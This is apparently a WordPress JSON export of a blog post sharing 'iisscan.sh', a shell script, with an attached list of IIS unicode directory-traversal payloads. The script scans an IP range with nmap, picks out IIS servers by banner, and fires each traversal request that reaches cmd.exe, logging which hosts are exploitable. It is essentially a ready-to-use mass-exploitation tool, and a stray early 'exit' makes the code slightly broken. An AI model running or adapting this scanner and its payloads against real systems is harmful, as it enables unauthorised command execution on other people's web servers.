#!\/bin\/sh\n# A Simple IIS network scanner\n# .\/iisscan.sh 10.*.54.3-23 output\n# http:\/\/www.bastardo.de(Apache) ;)\nclear\nif [ $# -ne 2 ]\n then\n\techo \"$0 [ip room] [outputfile]\" >&2\n\texit 0\n\telse\n\t echo \"Written by cd ;)\"\n\t echo \"ScR1p7k1dDi3 Pr0t3c7 Sy5t3m v 1.o\";exit 1\n\t echo \"Scan started against to $1 on port 80\"\n\n\techo \"This can take a while\"\n\tnmap -T Aggressive -v -v -sS $1 -p 80 -oG $1.out | grep Host\n\tcat $1.out | grep open | cut '-d ' -f 2 > $2\n\tfi\nrm $1.out\nsum=0\ng=`cat $2 | wc -c`\nsum=`expr $sum + $g`\nif [ $sum = 0 ]\n then \necho \"\n No matches of any http server!!!\n\n Thanks for use ...\"\n\trm $2\n\texit 1\n fi\n\necho \"Please wait... \n Testing server versions\"\n while read host ;\n\tdo \n\t echo \" Get http server version from: $host\"\n\t netcat -w 5 $host 80 < head.cmd | grep \"^Server: \" | sed \"s\/^Server:\/$host\/\" | grep \"IIS\" >>hosts.$1.tmp\n\tdone < $2\nsum=0\ng=`cat hosts.$1.tmp | wc -c`\nsum=`expr $sum + $g`\nif [ $sum = 0 ]\n then \necho \"\n No matches of IIS \n\n Thanks for use ...\"\n\trm hosts.$1.tmp\n\trm $2\n\texit 1\n fi\nrm $2\ncat hosts.$1.tmp | cut '-d ' -f 1 > $2\nrm hosts.$1.tmp\ntouch $2.exp\nwhile read host;\n do \n echo \"Try to Exploit $host\"\n while read unicodes;\n do\n echo \"$unicodes\" | netcat -w 10 $host 80 | grep 'Directory of c:' >fluff\n sum=0\n g=`cat fluff | wc -c`\n sum=`expr $sum + $g`\n if [ $sum = 0 ]\n\tthen \n\t echo \"try $unicodes\"\n\t else \n\t\techo \"$host is Exploitable with $unicodes\"\n\t\techo $host >>$2.exp\n fi\n done < unicodes.txt\n done < $2\nrm fluff\nsum=0\ng=`cat $2.exp | wc -c`\nsum=`expr $sum + $g`\nif [ $sum = 0 ]\n then \n\trm $2.exp\necho \"\n No matches of Exploitable IIS\n In >> $2 << you can find the IIS in this network\n\n Thanks for use ... \n \"\n\texit 1\n fi\necho \"\n\n You can find a list of Exploitable IIS in >> $2.exp << \n and in >> $2 << you can find the IIS in this network\n\n Thanks for use ... \n \"<\/pre>\nan old list of Unicodes
\nunicodes.txt<\/p>\n
GET \/scripts\/.%252e\/.%252e\/winnt\/system32\/cmd.exe?\/c+dir+c:\\\nGET \/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/MSADC\/root.exe?\/c+dir\nGET \/PBServer\/..%%35%63..%%35%63..%%35%63winnt\/system32\/cmd.exe?\/c+dir\nGET \/PBServer\/..%%35c..%%35c..%%35cwinnt\/system32\/cmd.exe?\/c+dir\nGET \/PBServer\/..%25%35%63..%25%35%63..%25%35%63winnt\/system32\/cmd.exe?\/c+dir\nGET \/PBServer\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir\nGET \/Rpc\/..%%35%63..%%35%63..%%35%63winnt\/system32\/cmd.exe?\/c+dir\nGET \/Rpc\/..%%35c..%%35c..%%35cwinnt\/system32\/cmd.exe?\/c+dir\nGET \/Rpc\/..%25%35%63..%25%35%63..%25%35%63winnt\/system32\/cmd.exe?\/c+dir\nGET \/Rpc\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir\nGET \/_mem_bin\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/_vti_bin\/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/_vti_bin\/..%%35c..%%35c..%%35c..%%35c..%%35c..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/_vti_bin\/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/_vti_bin\/..%255c..%255c..%255c..%255c..%255c..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/_vti_bin\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/_vti_bin\/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/_vti_bin\/..%c0%af..\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/_vti_cnf\/..%255c..%255c..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir\nGET \/_vti_cnf\/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/adsamples\/..%255c..%255c..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir\nGET \/adsamples\/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/c\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/cgi-bin\/..%255c..%255c..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir\nGET \/cgi-bin\/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/d\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/iisadmpwd\/..%252f..%252f..%252f..%252f..%252f..%252fwinnt\/system32\/cmd.exe?\/c+dir\nGET \/iisadmpwd\/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/msaDC\/..%%35%63..%%35%63..%%35%63..%%35%63winnt\/system32\/cmd.exe?\/c+dir\nGET \/msaDC\/..%%35c..%%35c..%%35c..%%35cwinnt\/system32\/cmd.exe?\/c+dir\nGET \/msaDC\/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt\/system32\/cmd.exe?\/c+dir\nGET \/msaDC\/..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir\nGET \/msadc\/..%%35%63..\/..%%35%63..\/..%%35%63..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/msadc\/..%%35c..\/..%%35c..\/..%%35c..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/msadc\/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt\/system32\/cmd.exe?\/c+dir\nGET \/msadc\/..%25%35%63..\/..%25%35%63..\/..%25%35%63..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/msadc\/..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir\nGET \/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/msadc\/..%255c..\/..%255c..\/..%255c\/..%c1%1c..\/..%c1%1c..\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/msadc\/..%c0%af..\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/msadc\/..%c1%af..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/msadc\/..%c1%pc..\/..%c1%pc..\/..%c1%pc..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/msadc\/..%c1%pc..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/msadc\/..%e0%80%af..\/..%e0%80%af..\/..%e0%80%af..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/msadc\/..%e0%80%af..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/msadc\/..%f0%80%80%af..\/..%f0%80%80%af..\/..%f0%80%80%af..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/msadc\/..%f0%80%80%af..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/msadc\/..%f8%80%80%80%af..\/..%f8%80%80%80%af..\/..%f8%80%80%80%af..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/msadc\/..%f8%80%80%80%af..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/msadc\/..\\ HTTP\/1.1%e0\\ HTTP\/1.1%80\\ HTTP\/1.1%af..\/..\\ HTTP\/1.1%e0\\ HTTP\/1.1%80\\ HTTP\/1.1%af..\/..\\ HTTP\/1.1%e0\\ HTTP\/1.1%80\\ HTTP\/1.1%af..\/winnt\/system32\/cmd.exe\\ HTTP\/1.1?\/c\\ HTTP\/1.1+dir\nGET \/samples\/..%255c..%255c..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir\nGET \/samples\/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts..%c1%9c..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/.%252e\/.%252e\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%%35%63..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%%35c..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%25%35%63..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%252f..%252f..%252f..%252fwinnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%252f..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%255c%255c..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%c0%9v..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%c0%qf..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%c1%8s..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%c1%9c..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%c1%af..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%c1%pc..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%e0%80%af..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%f0%80%80%af..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%f8%80%80%80%af..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/..%fc%80%80%80%80%af..\/winnt\/system32\/cmd.exe?\/c+dir\nGET \/scripts\/root.exe?\/c+dir\nGET \/msadc\/..%fc%80%80%80%80%af..\/..%fc%80%80%80%80%af..\/..%fc%80%80%80%80%af..\/winnt\/system32\/cmd.exe?\/c+dir<\/pre>\n <\/p>\n","protected":false},"excerpt":{"rendered":"
IIS Scanner you can find this script also at http:\/\/packetstormsecurity.com\/ head.cmd HEAD \/ HTTP\/1.0 iisscan.sh #!\/bin\/sh # A Simple IIS network scanner # .\/iisscan.sh 10.*.54.3-23 output # http:\/\/www.bastardo.de(Apache) \ud83d\ude09 clear if [ $# -ne 2 ] then echo „$0 [ip room] [outputfile]“ >&2 exit 0 else echo „Written by cd ;)“ echo „ScR1p7k1dDi3 Pr0t3c7 Sy5t3m […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-49","post","type-post","status-publish","format-standard","hentry","category-allgemein"],"_links":{"self":[{"href":"https:\/\/bastardo.de\/index.php\/wp-json\/wp\/v2\/posts\/49","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/bastardo.de\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/bastardo.de\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/bastardo.de\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/bastardo.de\/index.php\/wp-json\/wp\/v2\/comments?post=49"}],"version-history":[{"count":0,"href":"https:\/\/bastardo.de\/index.php\/wp-json\/wp\/v2\/posts\/49\/revisions"}],"wp:attachment":[{"href":"https:\/\/bastardo.de\/index.php\/wp-json\/wp\/v2\/media?parent=49"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/bastardo.de\/index.php\/wp-json\/wp\/v2\/categories?post=49"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/bastardo.de\/index.php\/wp-json\/wp\/v2\/tags?post=49"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}